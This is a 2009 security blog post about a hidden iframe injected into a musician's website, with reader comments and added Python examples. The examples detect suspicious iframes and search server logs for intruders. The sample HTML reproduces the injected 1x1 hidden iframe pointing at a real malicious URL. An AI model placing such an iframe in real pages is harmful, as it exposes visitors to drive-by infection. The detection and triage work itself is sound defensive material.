VanMorrison.com Iframe

Saw a virus alert today. A user performed an AOL Search (that alone should be banned in our end user behavior policy) on “van morrison” (another termination offense). He/She clicked on a link for www.vanmorrison.com. The antivirus detected an iframe attack.
Manually looking at www.vanmorrison.com’s source, I currently see an iframe loading ‘http://iqsp.ru:8080/index.php’. Perhaps someone can remind me, aren’t there sites like VirusTotal where you can send them a link and they’ll tell you what’s up? I haven’t yet learned JavaScript deobfuscation, but it didn’t look like anything good was happening.
So I took a sacrificial lamb system (still dangerous, don’t try this at home) and went to www.vanmorrison.com using various security systems to see what the result was.
Bluecoat – detected the virus on the site. Blocked Access to the entire site.
Scansafe – detected the virus on the site. Blocked access to the entire site.
Purewire – site loaded. Wanted me to install Flash (seemed legit but I didn’t do it). Java started up. I was prompted to download a file and run an ActiveX control. I chose not to install the ActiveX control but I did download the file. It was a PDF file.
VirusTotal saw the PDF file first on October 16th (today is the 21st). Currently 13 out of 41 vendors are detecting this as a virus. Did I mention signature detection is dead dead dead.
Did you notice the link to the Russian site is on port 8080? I wonder how many HTTP security implementations are proxying 8080 traffic in addition to 80.
Update 10/23/09
I see Sophos and eweek have linked to this article. Thanks!
Pob is correct, the infection changed after I posted this entry. I went back yesterday to see if anyone had cleaned it. I found the site on Google’s naughty list and the site had obfuscated code like his screenshots. Didn’t check on it today.
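The injection described above is a single off-site iframe dropped into otherwise legitimate HTML, served from a non-standard port and typically sized so the visitor never sees it. The script below is an added example (not code from the post or from any product named in it) that pulls every iframe out of saved page source and flags the ones that are off-site, on a port other than 80/443, or hidden. The sample HTML is constructed; the only real value in it is the URL quoted in the post. The canonical site hostname passed in is an assumption the caller supplies.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate same-site iframe and one injected
# iframe pointing at the off-site URL quoted in the post above.
SAMPLE_HTML = """
<html><body>
<h1>Tour dates</h1>
<iframe src="/embed/player.html" width="400" height="300"></iframe>
<iframe src="http://iqsp.ru:8080/index.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _looks_hidden(attrs):
    """True if the iframe is sized or styled so a visitor would not see it."""

    def tiny(value):
        try:
            return int(str(value).strip().rstrip("px")) <= 1
        except ValueError:
            return False

    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (
        tiny(attrs.get("width"))
        or tiny(attrs.get("height"))
        or "display:none" in style
        or "visibility:hidden" in style
    )


def find_suspicious_iframes(html, site_host):
    """Return one finding per iframe whose src is off-site, served on a
    non-standard port, or rendered invisibly.

    site_host is the hostname the page legitimately belongs to (assumption:
    a single canonical hostname; relative src values count as same-site).
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        url = urlparse(src)
        reasons = []
        if url.hostname and url.hostname.lower() != site_host.lower():
            reasons.append("off-site host %s" % url.hostname)
        if url.port not in (None, 80, 443):
            reasons.append("non-standard port %d" % url.port)
        if _looks_hidden(attrs):
            reasons.append("hidden or 1x1 frame")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "www.vanmorrison.com"):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

Run it against page source saved from a sacrificial machine (or fetched with a non-browser client that does not execute scripts); it never fetches the iframe target itself. The port check is the one the post points at: an iframe to a host on 8080 is worth a look even when the host name means nothing to you, and it is also the traffic a proxy configured only for port 80 will miss.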

5 Comments

  1. Hi, my website was being attacked also this morning.
    I googled the ‘http://iqsp.ru:8080/index.php’ and found your site.
    The code was injected into my index.php, hard-coded.
    I am using Drupal CMS.
    Do you have any idea how it was injected?
    I am really weak in the security part.

  2. This can happen many ways.
    The first thing I’d do is see if my host keeps FTP logs. Look for any FTP connections to your site by someone besides you. A lot of web hosts don’t provide that, but you can see the last IP to use FTP. So as long as you haven’t FTPed in yourself, you could log into your management panel and see if an unfamiliar IP address was the last to use FTP. That would indicate they broke in using your FTP password.
    Bad guys do this crap on websites if they can guess the password for an account. Other times, if a password is saved on your computer and your computer has a virus, they can get your password that way.
    If they didn’t get in using your FTP account, the next most likely method of infection is a vulnerability in your website content management software. In your case you need to make sure you’ve kept Drupal (and any plugins) patched.
    Drupal logs and your HTTP logs can be big hints as to exactly how this transpired.
    Of course you could have your site modified due to insecurities in your web host’s code. Usually people blame this first, but I think it’s wise to look at yourself first. Don’t point fingers at the host. But if everyone had their page modified (not just those running Drupal) then it’s probably them.
    How to fix it is the next question. It can be as simple as removing the offending code. If they compromised Drupal you need to make sure they didn’t create any new admin accounts for themselves. Who knows what other surprises may lurk.
    This could be a blog entry of its own, but since it’s a blog comment I can be a bit more stream of consciousness.
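The triage in the comment above comes down to two log questions: did anyone other than the owner write files over FTP, and did anyone other than the owner hit the CMS login or admin pages. The script below is an added example (not the commenter's code or anything from Drupal) that answers both from an xferlog-style FTP transfer log and an Apache combined access log. All log lines and IP addresses are constructed; the owner's IP set and the Drupal-style admin path prefixes are assumptions the operator would replace with their own.

```python
import re
from collections import defaultdict

# Constructed xferlog-style FTP transfer lines (date, transfer seconds, remote
# host, bytes, file, type, flags, direction i=incoming/o=outgoing, access mode,
# user, ...). None of these hosts or transfers are real.
FTP_XFERLOG = """\
Mon Oct 19 02:11:40 2009 1 203.0.113.7 1843 /public_html/index.php b _ o r siteowner ftp 0 * c
Tue Oct 20 04:23:02 2009 1 198.51.100.23 2011 /public_html/index.php b _ i r siteowner ftp 0 * c
Tue Oct 20 04:23:09 2009 1 198.51.100.23 2011 /public_html/user/login/index.php b _ i r siteowner ftp 0 * c
"""

# Constructed Apache combined-format access log lines for the same site.
HTTP_ACCESS_LOG = """\
198.51.100.23 - - [20/Oct/2009:04:25:10 +0000] "POST /user/login HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.23 - - [20/Oct/2009:04:25:41 +0000] "POST /admin/user/user/create HTTP/1.1" 302 0 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Oct/2009:09:02:15 +0000] "GET /node/12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# Addresses the site owner knows are their own (assumption: supplied by the operator).
OWNER_IPS = {"203.0.113.7"}

# Drupal-style login/admin path prefixes (assumption: adjust to the installed CMS).
ADMIN_PREFIXES = ("/admin", "/user/login")

XFER_RE = re.compile(
    r"^(?P<date>.{24}) \d+ (?P<host>\S+) \d+ (?P<file>\S+) \S \S (?P<dir>[io]) \S (?P<user>\S+)"
)
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def ftp_uploads_by_strangers(xferlog, owner_ips):
    """Return (ip, file, user) for every incoming FTP transfer from an address
    not in owner_ips. A write to index.php with the owner's account from an
    unknown address is the stolen-FTP-password case the comment describes."""
    hits = []
    for line in xferlog.splitlines():
        m = XFER_RE.match(line)
        if m and m.group("dir") == "i" and m.group("host") not in owner_ips:
            hits.append((m.group("host"), m.group("file"), m.group("user")))
    return hits


def admin_activity_by_strangers(access_log, owner_ips):
    """Return {ip: [paths]} for POSTs to login/admin paths from addresses not
    in owner_ips. A user-creation POST from a stranger is the 'did they add an
    admin account' check the comment recommends after a CMS compromise."""
    hits = defaultdict(list)
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        if m.group("ip") not in owner_ips and m.group("path").startswith(ADMIN_PREFIXES):
            hits[m.group("ip")].append(m.group("path"))
    return dict(hits)


if __name__ == "__main__":
    for ip, path, user in ftp_uploads_by_strangers(FTP_XFERLOG, OWNER_IPS):
        print("FTP upload from unknown address", ip, "wrote", path, "as", user)
    for ip, paths in admin_activity_by_strangers(HTTP_ACCESS_LOG, OWNER_IPS).items():
        print("admin/login POSTs from unknown address", ip, ":", ", ".join(paths))
```

Correlating the two outputs gives the timeline the comment is after: in the constructed sample the same unknown address uploads index.php over FTP with the owner's credentials and, two minutes later, logs into Drupal and creates a user, which points at a stolen password rather than a hosting-provider problem. If the FTP log is clean but the HTTP log shows admin POSTs from a stranger, the CMS or a plugin is the more likely way in.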
